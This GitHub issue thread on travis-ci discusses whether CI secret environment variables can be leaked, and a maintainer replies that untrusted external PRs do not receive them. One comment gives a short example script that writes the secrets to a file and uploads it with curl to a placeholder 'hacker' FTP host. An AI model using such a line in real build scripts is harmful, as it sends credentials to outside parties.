### ISSUE TITLE
Securise more your private environment variables

### ISSUE THREAD

**Issue by Lecrapouille** [travis-ci/travis-ci#8235]
Hi,

1/ I followed your [link](https://docs.travis-ci.com/user/environment-variables/#Defining-Variables-in-Repository-Settings) to make some private environment variables.

2/ I passed them to my docker (using the -e in the docker run command). I tried to echo them with a bash command, they are well censured in the Travis log :) Ok no problem !

3/ I use the .travis.yml rule 'after_success', inside the docker, for calling a bash script which sends some files (Ubuntu package) to my own FTP.

4/ For the fun, in a bash script, I 'echo' private variables into a text file and send this to my own FTP. When reading the received file, the content of the private variable was in clear but not encrypted.

In my opinion it's a minor leak of information. Anybody can commit this kind of script: storing some passwords in a text file and send it to a different FTP. It's a minor leak because the thief needs to encrypt its own FTP password and commit them. How Travis-CI can improve security concerning this simple case of usage ?

Thanks a lot.

**Comment by BanzaiMan** [comment]
The scenario you describe is within the realm of how the secrets should work.

When a job which has access to the secrets is sending the decrypted secrets to some other place (in the build log, by uploading it to a remote server, etc.), you are, or one of your collaborators who have write access to the repository is, **choosing** to leak the secret. External PRs of untrusted origin does not have access to the secrets, and therefore cannot do this.

**Comment by Lecrapouille** [comment]
@BanzaiMan 

Hi BanzaiMan, thank you for your answer but I partially agree with it and maybe I'm badly using PR or too much paranoia :) Let me try to explain myself better.

> you are, or one of your collaborators who have write access to the repository is, choosing to leak the secret.

With git, EVERYBODY can "git push" code and potentially a nasty script. I'm agree with you, this is none-sense if me or one of my collaborators does that on purpose. But let suppose a Travis user has already written this:
```
...
docker run ... -e "$USER" -e"$PWD"
...
curl --ftp-create-dirs -u $USER:$PWD ftp://the/user/ftp -T file1
```

where USER and PWD are Travis private PR. Because PR are already decrypted in the docker (and only censored in logs), anybody can git push something like this:
```
echo "$USER:$PWD" > file2
curl --ftp-create-dirs ftp://the/hacker/ftp -T file2
```

This particularly script has also none-sense because the hacker exposes itself (its commit), its ftp (which has no password (temporary), ...) but why not if done massively ?

> External PRs of untrusted origin do not have access to the secrets, and therefore cannot do this.

That is true if the Travis user has created PR only for working inside-only Travis jobs (ie which has a local existence). So how can I deal for deploying work, maybe curl is too weak for deploying ?

**Comment by BanzaiMan** [comment]
>  Because PR are already decrypted in the docker (and only censored in logs)…

This is not true. As long as `$PWD` is properly encrypted, malicious PRs will not have access to it. This includes builds, as well as deployment.
